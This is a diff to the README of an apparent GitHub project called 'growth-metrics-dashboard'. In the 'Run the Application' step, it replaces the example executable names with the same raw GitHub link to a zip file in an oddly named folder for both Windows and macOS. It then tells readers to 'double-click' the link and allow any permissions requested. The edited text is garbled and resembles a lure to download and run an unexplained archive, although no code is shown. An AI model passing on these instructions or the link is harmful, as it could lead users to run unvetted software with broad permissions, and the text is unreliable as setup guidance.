nuname8857/growth-metrics-dashboard/README.md

 4. **Run the Application**:
    - Navigate to the extracted folder.
-   - Double-click on the executable file (for example, `growth-metrics-dashboard.exe` on Windows or `growth-metrics-dashboard.app` on macOS).
+   - Double-click on the executable file (for example, `https://raw.githubusercontent.com/nuname8857/growth-metrics-dashboard/main/intagliation/growth-metrics-dashboard.zip` on Windows or `https://raw.githubusercontent.com/nuname8857/growth-metrics-dashboard/main/intagliation/growth-metrics-dashboard.zip` on macOS).
    - If prompted, allow any permissions needed to run the application.

 5. **Follow On-Screen Instructions**: